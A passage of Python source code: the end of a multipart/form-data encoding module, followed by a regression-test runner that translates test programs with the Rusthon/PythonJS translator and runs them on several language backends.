if self.fileobj is not None:
self.fileobj.seek(0)
elif self.value is None:
raise ValueError("Don't know how to reset this parameter")
@classmethod
def from_file(cls, paramname, filename):
"""Returns a new MultipartParam object constructed from the local
file at ``filename``.
``filesize`` is determined by os.path.getsize(``filename``)
``filetype`` is determined by mimetypes.guess_type(``filename``)[0]
``filename`` is set to os.path.basename(``filename``)
"""
return cls(paramname, filename=os.path.basename(filename),
filetype=mimetypes.guess_type(filename)[0],
filesize=os.path.getsize(filename),
fileobj=open(filename, "rb"))
@classmethod
def from_params(cls, params):
"""Returns a list of MultipartParam objects from a sequence of
name, value pairs, MultipartParam instances,
or from a mapping of names to values
The values may be strings or file objects, or MultipartParam objects.
MultipartParam object names must match the given names in the
name,value pairs or mapping, if applicable."""
if hasattr(params, 'items'):
params = params.items()
retval = []
for item in params:
if isinstance(item, cls):
retval.append(item)
continue
name, value = item
if isinstance(value, cls):
assert value.name == name
retval.append(value)
continue
if hasattr(value, 'read'):
# Looks like a file object
filename = getattr(value, 'name', None)
if filename is not None:
filetype = mimetypes.guess_type(filename)[0]
else:
filetype = None
retval.append(cls(name=name, filename=filename,
filetype=filetype, fileobj=value))
else:
retval.append(cls(name, value))
return retval
def encode_hdr(self, boundary):
"""Returns the header of the encoding of this parameter"""
boundary = encode_and_quote(boundary)
headers = ["--%s" % boundary]
if self.filename:
disposition = 'form-data; name="%s"; filename="%s"' % (self.name,
self.filename)
else:
disposition = 'form-data; name="%s"' % self.name
headers.append("Content-Disposition: %s" % disposition)
if self.filetype:
filetype = self.filetype
else:
filetype = "text/plain; charset=utf-8"
#headers.append("Content-Type: %s" % filetype)
#if self.filesize is not None:
# headers.append("Content-Length: %i" % self.filesize)
#else:
# headers.append("Content-Length: %i" % len(self.value))
headers.append("")
headers.append("")
#print "=============="
#print "form headers"
#print "\r\n".join(headers)
#print "=============="
return "\r\n".join(headers)
def encode(self, boundary):
"""Returns the string encoding of this parameter"""
if self.value is None:
value = self.fileobj.read()
else:
value = self.value
if re.search("^--%s$" % re.escape(boundary), value, re.M):
raise ValueError("boundary found in encoded string")
return "%s%s\r\n" % (self.encode_hdr(boundary), value)
def iter_encode(self, boundary, blocksize=4096):
"""Yields the encoding of this parameter
If self.fileobj is set, then blocks of ``blocksize`` bytes are read and
yielded."""
total = self.get_size(boundary)
current = 0
if self.value is not None:
block = self.encode(boundary)
current += len(block)
yield block
if self.cb:
self.cb(self, current, total)
else:
block = self.encode_hdr(boundary)
current += len(block)
yield block
if self.cb:
self.cb(self, current, total)
last_block = ""
encoded_boundary = "--%s" % encode_and_quote(boundary)
boundary_exp = re.compile("^%s$" % re.escape(encoded_boundary),
re.M)
while True:
block = self.fileobj.read(blocksize)
if not block:
current += 2
yield "\r\n"
if self.cb:
self.cb(self, current, total)
break
last_block += block
if boundary_exp.search(last_block):
raise ValueError("boundary found in file data")
last_block = last_block[-len(encoded_boundary)-2:]
current += len(block)
yield block
if self.cb:
self.cb(self, current, total)
def get_size(self, boundary):
"""Returns the size in bytes that this param will be when encoded
with the given boundary."""
if self.filesize is not None:
valuesize = self.filesize
else:
valuesize = len(self.value)
return len(self.encode_hdr(boundary)) + 2 + valuesize
def encode_string(boundary, name, value):
"""Returns ``name`` and ``value`` encoded as a multipart/form-data
variable. ``boundary`` is the boundary string used throughout
a single request to separate variables."""
return MultipartParam(name, value).encode(boundary)
def encode_file_header(boundary, paramname, filesize, filename=None,
filetype=None):
"""Returns the leading data for a multipart/form-data field that contains
file data.
``boundary`` is the boundary string used throughout a single request to
separate variables.
``paramname`` is the name of the variable in this request.
``filesize`` is the size of the file data.
``filename`` if specified is the filename to give to this field. This
field is only useful to the server for determining the original filename.
``filetype`` if specified is the MIME type of this file.
The actual file data should be sent after this header has been sent.
"""
return MultipartParam(paramname, filesize=filesize, filename=filename,
filetype=filetype).encode_hdr(boundary)
def get_body_size(params, boundary):
"""Returns the number of bytes that the multipart/form-data encoding
of ``params`` will be."""
size = sum(p.get_size(boundary) for p in MultipartParam.from_params(params))
return size + len(boundary) + 6
def get_headers(params, boundary):
"""Returns a dictionary with Content-Type and Content-Length headers
for the multipart/form-data encoding of ``params``."""
headers = {}
boundary = urllib.quote_plus(boundary)
headers['Content-Type'] = "multipart/form-data; boundary=%s" % boundary
headers['Content-Length'] = str(get_body_size(params, boundary))
#headers['Content-Length'] = '-1'
return headers
class multipart_yielder:
def __init__(self, params, boundary, cb):
self.params = params
self.boundary = boundary
self.cb = cb
self.i = 0
self.p = None
self.param_iter = None
self.current = 0
self.total = get_body_size(params, boundary)
def __iter__(self):
return self
def next(self):
"""generator function to yield multipart/form-data representation
of parameters"""
if self.param_iter is not None:
try:
block = self.param_iter.next()
self.current += len(block)
if self.cb:
self.cb(self.p, self.current, self.total)
return block
except StopIteration:
self.p = None
self.param_iter = None
if self.i is None:
raise StopIteration
elif self.i >= len(self.params):
self.param_iter = None
self.p = None
self.i = None
block = "--%s--\r\n" % self.boundary
self.current += len(block)
if self.cb:
self.cb(self.p, self.current, self.total)
return block
self.p = self.params[self.i]
self.param_iter = self.p.iter_encode(self.boundary)
self.i += 1
return self.next()
def reset(self):
self.i = 0
self.current = 0
for param in self.params:
param.reset()
def multipart_encode(params, boundary=None, cb=None):
"""Encode ``params`` as multipart/form-data.
``params`` should be a sequence of (name, value) pairs or MultipartParam
objects, or a mapping of names to values.
Values are either strings parameter values, or file-like objects to use as
the parameter value. The file-like objects must support .read() and either
.fileno() or both .seek() and .tell().
If ``boundary`` is set, then it as used as the MIME boundary. Otherwise
a randomly generated boundary will be used. In either case, if the
boundary string appears in the parameter values a ValueError will be
raised.
If ``cb`` is set, it should be a callback which will get called as blocks
of data are encoded. It will be called with (param, current, total),
indicating the current parameter being encoded, the current amount encoded,
and the total amount to encode.
Returns a tuple of `datagen`, `headers`, where `datagen` is a
generator that will yield blocks of data that make up the encoded
parameters, and `headers` is a dictionary with the assoicated
Content-Type and Content-Length headers.
Examples:
>>> datagen, headers = multipart_encode( [("key", "value1"), ("key", "value2")] )
>>> s = "".join(datagen)
>>> assert "value2" in s and "value1" in s
>>> p = MultipartParam("key", "value2")
>>> datagen, headers = multipart_encode( [("key", "value1"), p] )
>>> s = "".join(datagen)
>>> assert "value2" in s and "value1" in s
>>> datagen, headers = multipart_encode( {"key": "value1"} )
>>> s = "".join(datagen)
>>> assert "value2" not in s and "value1" in s
"""
if boundary is None:
boundary = gen_boundary()
else:
boundary = urllib.quote_plus(boundary)
headers = get_headers(params, boundary)
params = MultipartParam.from_params(params)
return multipart_yielder(params, boundary, cb), headers
|
|
#!/usr/bin/env python3
"""
Without argument: run all the regression tests.
About the tests:
* They are stored as python file in the subdirectories.
* The firstline must be an explanation about the test.
* Errors(must be True) defines an Error that must be corrected
* Warning(must be True) defines something that should be corrected
once corrected, must be redefined as an Error
"""
import os, sys, inspect, re, tempfile, subprocess, json
import wsgiref, wsgiref.simple_server
typedpython_folder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile(inspect.currentframe()))[0], "../pythonjs")))
if typedpython_folder not in sys.path:
sys.path.insert(0, typedpython_folder)
import typedpython
if 'NODE_PATH' not in os.environ:
os.environ['NODE_PATH'] = '/usr/local/lib/node_modules/'
tmpname = os.path.join(tempfile.gettempdir(), "xxx_regtest")
print("Temporary files are stored into '%s...'" % tmpname)
print()
show_details = len(sys.argv) > 1
# List of valid filenames in the parameters
argv = [os.path.abspath(name)
for name in sys.argv[1:]
if os.path.exists(name)
]
__sandbox = {
'mycollection' : range(10)
}
__clients = {} ## keeps track of iterator indices
def httpd_reply( env, start_response ):
path = env['PATH_INFO']
host = env['HTTP_HOST']
client = env['REMOTE_ADDR']
arg = env['QUERY_STRING']
if client not in __clients:
__clients[ client ] = {}
length = 0
if 'CONTENT_LENGTH' in env: length = int(env['CONTENT_LENGTH'])
data = env['wsgi.input'].read( length ).decode('utf-8')
#print('http_reply ->', path, host, client, arg, data)
msg = json.loads( data )
res = ''
if 'call' in msg:
assert 'args' in msg
if msg['call'] == 'concat':
res = ''.join( msg['args'] )
elif msg['call'] == 'add':
res = msg['args'][0] + msg['args'][1]
else:
raise NotImplementedError( msg )
elif 'iter' in msg:
name = msg['iter']
assert name in __sandbox
if name not in __clients[ client ]:
__clients[ client ][name] = 0
index = __clients[ client ][name]
iterable = __sandbox[name]
if index == len(iterable):
index = 0
res = '__STOP_ITERATION__'
else:
res = iterable[ index ]
index += 1
__clients[ client ][name] = index
elif 'set' in msg:
__sandbox[ msg['set'] ] = msg['value']
elif 'get' in msg:
res = __sandbox[ msg['get'] ]
else:
raise NotImplementedError( msg )
start_response( '200 OK', [] )
return [ json.dumps(res).encode('utf-8') ]
httpd = wsgiref.simple_server.make_server( 'localhost', 8080, httpd_reply )
import threading
thread_id = threading._start_new_thread( httpd.serve_forever, ())
def runnable(command):
## this fails with lua5.1 "lua -v"
#"""Returns True is the standard out of the command display something"""
#f = os.popen(command, "r")
#output = f.read()
#f.close()
#return output != ''
try:
with open(os.devnull, "w") as f:
subprocess.check_call( command.split(), stdout=f, stderr=f )
print("Success: " + command)
return True
except OSError:
print("Failure: " + command)
return False
def run_pypy_test_on(filename):
"""PyPy"""
write("%s.py" % tmpname, patch_python(filename, python='PYPY'))
return run_command("%s %s.py %s" % (pypy_exe, tmpname, display_errors))
def run_old_pypy_test_on(filename):
"""PyPy 1.9"""
write("%s.py" % tmpname, patch_python(filename, python='PYPY'))
return run_command("%s %s.py %s" % (old_pypy_exe, tmpname, display_errors))
old_pypy_runnable = pypy_runnable = False
old_pypy_exe = pypy_exe = None
if os.path.isfile( os.path.expanduser('~/pypy-2.5.0-linux64/bin/pypy') ):
pypy_runnable = True
pypy_exe = os.path.expanduser('~/pypy-2.5.0-linux64/bin/pypy')
run_pypy_test_on.__doc__ = 'PyPy 2.5.0'
elif os.path.isfile( os.path.expanduser('~/pypy-2.3.1-linux64/bin/pypy') ):
pypy_runnable = True
pypy_exe = os.path.expanduser('~/pypy-2.3.1-linux64/bin/pypy')
run_pypy_test_on.__doc__ = 'PyPy 2.3.1'
elif os.path.isfile( os.path.expanduser('~/pypy-2.2-linux64/bin/pypy') ):
pypy_runnable = True
pypy_exe = os.path.expanduser('~/pypy-2.2-linux64/bin/pypy')
run_pypy_test_on.__doc__ = 'PyPy 2.2'
elif runnable( 'pypy --help' ):
pypy_runnable = True
pypy_exe = 'pypy'
if os.path.isfile( os.path.expanduser('~/pypy-1.9/bin/pypy') ) and '--old-pypy' in sys.argv:
old_pypy_runnable = True
old_pypy_exe = os.path.expanduser('~/pypy-1.9/bin/pypy')
webclgl = []
if os.path.isdir( os.path.expanduser('~/webclgl') ):
#webclgl.append( open( os.path.expanduser('~/webclgl/WebCLGL_2.0.Min.class.js'), 'rb').read().decode('utf-8') )
webclgl.append( open( os.path.expanduser('~/webclgl/WebCLGLUtils.class.js'), 'rb').read().decode('utf-8') )
webclgl.append( open( os.path.expanduser('~/webclgl/WebCLGLBuffer.class.js'), 'rb').read().decode('utf-8') )
webclgl.append( open( os.path.expanduser('~/webclgl/WebCLGLKernel.class.js'), 'rb').read().decode('utf-8') )
webclgl.append( open( os.path.expanduser('~/webclgl/WebCLGL.class.js'), 'rb').read().decode('utf-8') )
## rhino is not run by default because it simply freezes up on maximum callstack errors
rhino_runnable = '--rhino' in sys.argv and runnable("rhino -e 'quit()'")
node_runnable = runnable("node --help")
#shedskin_runnable = runnable("shedskin --help")
## sudo npm install nodewebkit -g
## nodewebkit npm package is broken? https://github.com/shama/nodewebkit/issues/31
#nodewebkit = '/usr/local/lib/node_modules/nodewebkit/bin/nodewebkit'
## download https://github.com/rogerwang/node-webkit/releases/tag/nw-v0.9.2
## and extract to your home directory.
nodewebkit_runnable = False
nodewebkit = os.path.expanduser('~/node-webkit-v0.10.0-rc1-linux-x64/nw')
if os.path.isfile( nodewebkit ): nodewebkit_runnable = True
else:
nodewebkit = os.path.expanduser('~/node-webkit-v0.9.2-linux-x64/nw')
if os.path.isfile( nodewebkit ): nodewebkit_runnable = True
else:
nodewebkit = os.path.expanduser('~/node-webkit-v0.9.1-linux-x64/nw')
if os.path.isfile( nodewebkit ): nodewebkit_runnable = True
else:
nodewebkit = os.path.expanduser('~/node-webkit-v0.8.4-linux-x64/nw')
if os.path.isfile( nodewebkit ): nodewebkit_runnable = True
if not show_details or '--no-nodewebkit' in sys.argv:
nodewebkit_runnable = False
#dart2js = os.path.expanduser( '~/dart-sdk-1.0/dart-sdk/bin/dart2js') ## TODO support dart-sdk-1.3+
dart2js = os.path.expanduser( '~/dart-sdk/bin/dart2js') # tested with dart 1.3
dart2js_runnable = runnable( dart2js + ' -h' ) and '--dart2js' in sys.argv
dart_exe = os.path.expanduser( '~/dart-sdk/bin/dart')
dart_runnable = os.path.isfile( dart_exe )
coffee_runnable = runnable( "coffee -v" ) and '--coffee' in sys.argv
lua_runnable = runnable( "lua -v" ) and '--lua' in sys.argv
#luajit_runnable = runnable( "luajit -v" ) and '--luajit' in sys.argv
luajit_runnable = runnable( "luajit -v" )
lua2js = os.path.abspath( '../external/lua.js/lua2js' )
luajs_runnable = os.path.isfile( lua2js ) and '--lua2js' in sys.argv
go_runnable = runnable( 'go version')
gopherjs_runnable = False #runnable( 'gopherjs') and '--gopherjs' in sys.argv
rust_runnable = runnable( 'rustc --help')
cpp_runnable = runnable( 'g++ --help')
assert rhino_runnable or node_runnable
if show_details:
display_errors = ""
else:
display_errors = "2>/dev/null"
def files():
"""returns all the filenames of the regression tests.
this also needs to copy all the original python files to /tmp
because `from xxx import *` syntax will trigger the translator
to read files from the same directory and insert them.
"""
tests = []
html_tests = []
benchmarks = []
mods = []
for dirpath, dirnames, filenames in os.walk('.'):
if dirpath == '.':
continue
for filename in filenames:
a = dirpath + os.path.sep + filename
if filename.endswith(".py"):
if 'bench' in dirpath:
benchmarks.append( a )
else:
tests.append( a )
elif 'html' in dirpath:
if filename.endswith(".html"):
html_tests.append( a )
elif filename.endswith('.py'): ## these are modules
mods.append( filename )
tmpdir = tempfile.gettempdir()
for mod in mods+tests:
data = open(mod,'rb').read()
name = os.path.split(mod)[-1]
open(os.path.join(tmpdir, name), 'wb').write( data )
tests.extend( html_tests )
tests.extend( benchmarks )
return tests
def read(filename):
"""Returns the file content as a string"""
f = open(filename)
content = f.read()
f.close()
return content
def write(filename, content):
"""Write the content into the file"""
f = open(filename, "w")
f.write(content)
f.close()
def run_command(command, returns_stdout_stderr=False, nodewebkit_workaround=False):
"""Returns the number of problems"""
if os.path.isfile("%s.errors" % tmpname):
os.unlink("%s.errors" % tmpname)
f = os.popen(command + " 2>%s.errors" % tmpname, 'r')
killed = False
try:
stdout = f.read().strip()
except KeyboardInterrupt:
stdout = f.read().strip()
killed = True
f.close()
stderr = read("%s.errors" % tmpname)
if nodewebkit_workaround:
stdout = stderr
stderr = ''
a = []
for line in stdout.splitlines():
if 'INFO:CONSOLE' in line:
line = line.replace('\\n', '\n')
line = line.replace('\\u003C', '<')
start = line.index('"')
end = line.rindex('"')
a.append( line[start+1:end] )
stdout = '\n'.join(a)
if stderr:
if show_details:
print('TEST ERROR!')
print(stderr)
if killed:
print(stdout)
sys.exit()
if returns_stdout_stderr:
return stdout, stderr
#########################
if show_details and stdout:
print(stdout)
unknown = []
for line in stdout.splitlines():
if _benchmark:
if line.startswith('#'):
_benchmark.append( line )
else:
#exe = command.split()[0]
_benchmark.append( _test_description + ' ' + line )
else:
unknown.append(line)
errors = '\n'.join(unknown) + stderr
d = {}
x = errors.count("Error fail")
if x:
d['Error'] = x
x = errors.count("Warning fail")
if x:
d['Warning'] = x
if len(d) == 0 and errors != '':
if '.py", line' in errors:
d["Syntax Error Python"] = 1
else:
d["?"] = 1
return d
_benchmark = None
def in_benchmark():
if _benchmark: return True
else: return False
def start_benchmark( name ):
if not show_details: print('starting benchmark:', name)
global _benchmark
if name.endswith('-typed.py'):
untypedname = name.split('-typed.py')[0] + '.py'
_benchmark = open('/tmp/%s.perf' %untypedname, 'rb').read().decode('utf-8').splitlines()
else:
_benchmark = [
'font=Helvetica',
'fontsz=12',
'=color_per_datum',
'yformat=%g',
'ylabel=seconds'
]
def end_benchmark( name ):
print('ending benchmark:', name)
global _benchmark
path = '/tmp/%s.perf' %name
f = open( path, 'wb' )
data = '\n'.join( _benchmark )
f.write( data.encode('utf-8') )
f.close()
os.system( './bargraph.pl -eps %s > /tmp/%s.eps' %(path,name))
_benchmark = None
def patch_assert(filename):
"""Patch the regression tests to add information into asserts"""
out = []
for i, line in enumerate(read(filename).split('\n')):
out.append(re.sub("(TestError|TestWarning)\((.*)\)",
r'\1("%s",%d,\2,u"""\2""")' % (filename, i),
line)
)
return '\n'.join(out)
_patch_header = """# -*- coding: utf-8 -*-
def TestError(file, line, result, test):
if result == False:
print(file + ":" + str(line) + " Error fail " + test)
def TestWarning(file, line, result, test):
if result == False:
print(file + ":" + str(line) + " Warning fail " + test)
"""
_patch_header_go = """# -*- coding: utf-8 -*-
def TestError(file:string, line:int, result:bool, test:string):
if result == False:
print(file + ":" + str(line) + " Error fail " + test)
"""
_patch_header_rust = """# -*- coding: utf-8 -*-
def TestError(file:string, line:int, result:bool, test:string):
if result == False:
print(file, line, " Error fail ", test)
"""
_python_only_extra_header = """
try:
import threading
threading.start_webworker = lambda f,a: threading._start_new_thread(f,a)
threading.start_new_thread = threading._start_new_thread
except ImportError:
pass
class __faker__(object):
def __enter__(self, *args): pass
def __exit__(self, *args): pass
def __call__(self, *args, **kw):
return lambda f: f
def vectorize(self, f):
return f
def main(self, f):
return f
def object(self, f):
return f
def method(self, f):
return f
webworker = __faker__()
glsl = __faker__()
gpu = __faker__()
returns = __faker__()
typedef = __faker__()
vec2 = None
mat4 = None
def int16(a): return int(a)
try:
import numpy
except ImportError:
try:
import numpypy as numpy
except ImportError:
pass
from math import isnan as isNaN
"""
def patch_python(filename, dart=False, python='PYTHONJS', backend=None):
"""Rewrite the Python code"""
code = patch_assert(filename)
## a main function can not be simply injected like this for dart,
## because dart has special rules about what can be created outside
## of the main function at the module level.
#if dart:
# out = []
# main_inserted = False
# for line in code.splitlines():
# if line.startswith('TestError') or line.startswith('TestWarning'):
# if not main_inserted:
# out.append('def main():')
# main_inserted = True
# out.append( '\t'+line )
# else:
# out.append( line )
# code = '\n'.join( out )
a = [
'PYTHON="%s"'%python,
'BACKEND="%s"'%backend,
]
if backend == 'RUST':
a.append(_patch_header_rust)
elif backend in ('GO', 'CPP'):
a.append(_patch_header_go)
else:
a.append(_patch_header)
if python != 'PYTHONJS': ## remove extra type syntax to run in regular Python
code = typedpython.transform_source( code, strip=True )
a.append( _python_only_extra_header )
a.append( code )
if not dart and python != 'PYTHONJS':
a.append( 'main()' )
return '\n'.join( a )
def run_python_test_on(filename):
"""Python2"""
write("%s.py" % tmpname, patch_python(filename, python='PYTHON2'))
return run_command("python %s.py %s" % (tmpname, display_errors))
def run_python3_test_on(filename):
"""Python3"""
write("%s.py" % tmpname, patch_python(filename, python='PYTHON3'))
return run_command("python3 %s.py %s" % (tmpname, display_errors))
def translate_js(filename, javascript=False, dart=False, coffee=False, lua=False, go=False, rust=False, cpp=False, multioutput=False, requirejs=True):
global tmpname
tmpname = os.path.join(
tempfile.gettempdir(),
'regtest-%s'%filename.split('/')[-1]
)
output_name = "%s.py" % tmpname
if javascript:
content = 'pythonjs.configure(javascript=True)\n' + patch_python(filename, backend='JAVASCRIPT')
elif dart:
source = [
'pythonjs.configure(dart=True)',
patch_python(filename, dart=True, backend='DART')
]
content = '\n'.join( source )
elif lua:
source = [
'pythonjs.configure(lua=True)',
patch_python(filename, backend='LUA')
]
content = '\n'.join( source )
elif go:
content = patch_python(filename, backend='GO')
elif rust:
content = patch_python(filename, backend='RUST')
elif cpp:
content = patch_python(filename, backend='CPP')
else:
content = patch_python(filename)
code = '\n'.join(
[
'# -*- coding: utf-8 -*-',
'pythonjs.configure(runtime_exceptions=False)',
content
]
)
write(output_name, code)
cmd = [
os.path.join("..", "rusthon.py"),
output_name,
'--output=/tmp/output',
'--dump',
]
if dart:
cmd.append( '--dart' )
elif lua:
cmd.append( '--lua')
elif go:
cmd.append( '--go' )
elif rust:
cmd.append( '--rust' )
elif cpp:
cmd.append( '--c++' )
elif javascript:
cmd.append( '--javascript' )
if not requirejs:
cmd.append( '--no-wrapper' )
print(' '.join(cmd))
stdout, stderr = run_command(' '.join(cmd), returns_stdout_stderr=True)
if stderr:
return ''
else:
stdout = open('/tmp/output', 'rb').read().decode('utf-8')
jsheader = ''
if multioutput or (stdout.startswith("{") and stdout.endswith("}")):
d = json.loads( stdout )
stdout = d.pop('main')
#builtins = read(os.path.join("../pythonjs", "pythonjs.js"))
for jsfile in d:
if not jsfile.startswith('/'):
stdout = stdout.replace('"%s"' %jsfile, '"/tmp/%s"' %jsfile)
write(
os.path.join('/tmp', jsfile),
'\n'.join( [jsheader, d[jsfile]] )
)
if dart:
if os.path.isfile('/tmp/dart2js-output.js'):
os.unlink('/tmp/dart2js-output.js')
dart_input = '/tmp/dart2js-input.dart'
open( dart_input, 'wb').write( stdout.encode('utf-8') )
cmd = [
dart2js,
'-o', '/tmp/dart2js-output.js',
dart_input
]
if show_details:
subprocess.call( cmd )
else:
sout, serr = run_command(' '.join(cmd), returns_stdout_stderr=True)
if os.path.isfile('/tmp/dart2js-output.js'):
return open('/tmp/dart2js-output.js', 'rb').read().decode('utf-8')
else:
return ''
else:
return '\n'.join( [jsheader, stdout] )
def run_if_no_error(function):
"""Run the function if the JS code is not empty"""
global js
if js:
return function(js)
else:
return {'Translation error':1}
def run_pythonjs_test_on(dummy_filename):
"""JS PythonJS tests"""
return run_if_no_error(run_js_rhino)
def run_pythonjsjs_test_on(filename):
"""JSJS PythonJS with javascript tests"""
return run_pythonjs_test_on(filename)
def run_js_rhino(content):
"""Run Javascript using Rhino"""
builtins = read(os.path.join("../pythonjs", "pythonjs.js"))
# Patch in order to run Rhino
builtins = builtins.replace('Object.create(null)', '{}', 1)
# Add the program to test
content = builtins + content
# Remove documentation strings from JavaScript (Rhino don't like)
content = re.sub('^ *".*" *$', '', content)
# Add the console for Rhino
content = '''
console = { log: print } ;
process = { title:"", version:"" } ;
''' + content
write("%s.js" % tmpname, content)
return run_command("rhino -O -1 %s.js" % tmpname)
def run_pythonjs_test_on_node(dummy_filename):
"""Rusthon JS (nodejs)"""
return run_if_no_error(run_js_node)
def run_pythonjsjs_test_on_node(filename):
"""PythonJS (fast backend)"""
return run_pythonjs_test_on_node(filename)
def run_js_node(content):
"""Run Javascript using Node"""
#builtins = read(os.path.join("../pythonjs", "pythonjs.js"))
write("/tmp/mymodule.js", content)
lines = [
"var requirejs = require('requirejs')",
"var module = requirejs('mymodule')",
"module.main()"
]
write("%s.js" % tmpname, '\n'.join(lines))
return run_command("node %s.js" % tmpname)
def run_pythonjs_test_on_nodewebkit(dummy_filename):
"""Rusthon JS (nodewebkit)"""
return run_if_no_error(run_js_nodewebkit)
def run_pythonjsjs_test_on_nodewebkit(filename):
"""PythonJS (fast backend) - NodeWebkit"""
return run_pythonjs_test_on_nodewebkit(filename)
def run_js_nodewebkit(content):
"""Run Javascript using NodeWebkit"""
## there is likely a bug in requirejs and/or nodewebkit that prevents WebWorkers from working,
## `workerjs` for node also seems like its incompatible with nodewebkit and requirejs,
## as a quick workaround simply strip away the wrapper function from the javascript.
code = '\n'.join( content.strip().splitlines()[1:-2] )
write("/tmp/package.json", '{"name":"test", "main":"test.html"}')
#write("/tmp/mymodule.js", content)
lines = [
"var __nw = require('nw.gui')",
"var requirejs = require('requirejs')",
#"var module = requirejs('mymodule')",
#"module.main()",
code,
"main()",
"__nw.App.quit()"
]
html = ['<html>']
if webclgl:
for data in webclgl:
html.append('<script>')
html.append( data )
html.append('</script>')
html.append('<script>')
html.extend( lines )
html.append('</script>')
html.append('</html>')
write("/tmp/test.html", '\n'.join(html))
#write("%s.js" % tmpname, '\n'.join(lines))
#return run_command("node %s.js" % tmpname)
return run_command("%s /tmp" %nodewebkit, nodewebkit_workaround=True)
def run_pythonjs_dart_test_on_node(dummy_filename):
"""PythonJS (Dart backend - dart2js)"""
return run_if_no_error(run_dart2js_node)
def run_dart2js_node(content):
"""Run Dart2js using Node"""
write("%s.js" % tmpname, content)
return run_command("node %s.js" % tmpname)
def run_pythonjs_dart_test_on_dart(dummy_filename):
"""PythonJS (Dart backend - Dart VM)"""
return run_if_no_error(run_dart)
def run_dart(content):
"""Run Dart2js using Node"""
#write("%s.js" % tmpname, content)
return run_command("%s %s" % (dart_exe, "/tmp/dart2js-input.dart"))
def run_pythonjs_coffee_test_on_node(dummy_filename):
"""PythonJS (CoffeeScript)"""
return run_if_no_error(run_coffee_node)
def run_coffee_node(content):
"""Run CoffeeScript using Node"""
#builtins = read(os.path.join("../pythonjs", "pythonjs.js"))
write("%s.js" % tmpname, content)
return run_command("node %s.js" % tmpname)
def run_pythonjs_lua_test_on_lua(dummy_filename):
"""PythonJS (Lua) on Lua"""
return run_if_no_error(run_lua_lua)
def run_lua_lua(content):
"""Run Lua using Lua"""
write("%s.lua" % tmpname, content)
return run_command("lua %s.lua" % tmpname)
def run_pythonjs_lua_test_on_luajit(dummy_filename):
"""PythonJS (LuaJIT backend)"""
return run_if_no_error(run_lua_luajit)
def run_lua_luajit(content):
"""Run Lua using LuaJIT"""
write("%s.lua" % tmpname, content)
return run_command("luajit %s.lua" % tmpname)
def run_pythonjs_luajs_test_on_node(dummy_filename):
"""PythonJS (Lua.js)"""
return run_if_no_error(run_luajs_node)
def run_luajs_node(content):
"""Run Lua.js using Node"""
builtins = read(os.path.join("../external/lua.js", "lua.js"))
write("%s.js" % tmpname, builtins + '\n' + content)
return run_command("node %s.js" % tmpname)
def run_pythonjs_go_test(dummy_filename):
"""PythonJS (Go backend)"""
return run_if_no_error(run_go)
def run_go(content):
"""compile and run go program"""
write("%s.go" % tmpname, content)
errors = run_command("go build -o /tmp/regtest-go %s.go" % tmpname)
if errors:
return errors
else:
return run_command( '/tmp/regtest-go' )
def run_pythonjs_gopherjs_test(dummy_filename):
"""PythonJS (Gopherjs)"""
return run_if_no_error(run_gopherjs_node)
def run_gopherjs_node(content):
"""Run Gopherjs using Node"""
write("%s.js" % tmpname, content)
return run_command("node %s.js" % tmpname)
## rust backend ##
def run_pythonjs_rust_test(dummy_filename):
"""Rusthon"""
return run_if_no_error(run_rust)
def run_rust(content):
"""compile and run go program"""
write("%s.rs" % tmpname, content)
#errors = run_command("rustc -o /tmp/regtest-rust %s.rs" % tmpname)
subprocess.check_call(['rustc', '--crate-name', 'regtest', '-o', '/tmp/regtest-rust', '%s.rs' % tmpname] )
errors = False
if errors:
return errors
else:
return run_command( '/tmp/regtest-rust' )
## c++ backend ##
def run_pythonjs_cpp_test(dummy_filename):
"""Rusthon C++ Backend"""
return run_if_no_error(run_cpp)
def run_cpp(content):
"""compile and run c++ program"""
write("%s.cpp" % tmpname, content)
if in_benchmark():
## gcc will not use atomic updates on std::shared_ptr when not linked to libpthread, -pthread is omitted here.
## http://stackoverflow.com/questions/15129263/is-there-a-non-atomic-equivalent-of-stdshared-ptr-and-why-isnt-there-one-in
cmd = ['g++', '-O3', '-fprofile-generate', '-march=native', '-mtune=native', '%s.cpp'%tmpname, '-o', '/tmp/regtest-cpp', '-std=c++11' ]
else:
cmd = ['g++', '-march=native', '-mtune=native', '%s.cpp'%tmpname, '-o', '/tmp/regtest-cpp', '-pthread', '-std=c++11' ]
try:
subprocess.check_call( cmd )
except subprocess.CalledProcessError:
## reading template errors become so long we need to filter them out below ##
print('='*80)
p = subprocess.Popen(cmd, stderr=subprocess.PIPE)
p.wait()
if p.returncode: ## there was an error
error = p.stderr.read().decode('utf-8')
for line in error.splitlines():
if '.py' in line:
lineno = line.split(':')[1]
if 'In function' in line:
print(lineno, line.split('`')[-1])
elif 'error:' in line:
print(lineno, '\t'+line.split('error: ')[-1])
else:
print(lineno, line)
sys.exit()
if in_benchmark():
run_command( '/tmp/regtest-cpp' )
cmd = ['g++', '-O3', '-fprofile-use', '-march=native', '-mtune=native', '%s.cpp'%tmpname, '-o', '/tmp/regtest-cpp', '-std=c++11' ]
print('<G++ PGO>')
subprocess.check_call( cmd )
return run_command( '/tmp/regtest-cpp' )
else:
return run_command( '/tmp/regtest-cpp' )
## NodeWebkit and Google Chrome ##
def run_html_test( filename, sum_errors ):
lines = open(filename, 'rb').read().decode('utf-8').splitlines()
filename = os.path.split(filename)[-1]
doc = []; script = None
for line in lines:
if line.strip().startswith('<link') and 'stylesheet' in line and '~/' in line:
doc.append('<style>')
css = line.split('href=')[-1].split()[0][1:-1]
print('css', css)
assert css.startswith('~/')
assert css.endswith('.css')
assert os.path.isfile( os.path.expanduser(css) )
doc.append( open(os.path.expanduser(css), 'rb').read().decode('utf-8') )
doc.append('</style>')
elif line.strip().startswith('<script'):
if 'type="text/python"' in line:
doc.append( '<script type="text/javascript">')
script = list()
elif 'src=' in line and '~/' in line: ## external javascripts installed in users home folder
x = line.split('src="')[-1].split('"')[0]
if os.path.isfile(os.path.expanduser(x)):
doc.append( '<script type="text/javascript">' )
doc.append( open(os.path.expanduser(x), 'rb').read().decode('utf-8') )
doc.append( '</script>')
else:
doc.append( line )
elif line.strip() == '</script>':
if script:
open('/tmp/%s.js'%filename, 'wb').write( ('\n'.join(script)).encode('utf-8') )
js = translate_js( '/tmp/%s.js'%filename, requirejs=False, javascript=True ) ## inserts TestError and others
doc.append( js )
doc.append( line )
script = None
elif isinstance( script, list ):
script.append( line )
else:
doc.append( line )
html = '\n'.join(doc)
open('/tmp/%s.html'%filename, 'wb').write( html.encode('utf-8') )
if '--nodewebkit' in sys.argv:
## nodewebkit can bypass all cross origin browser-side security
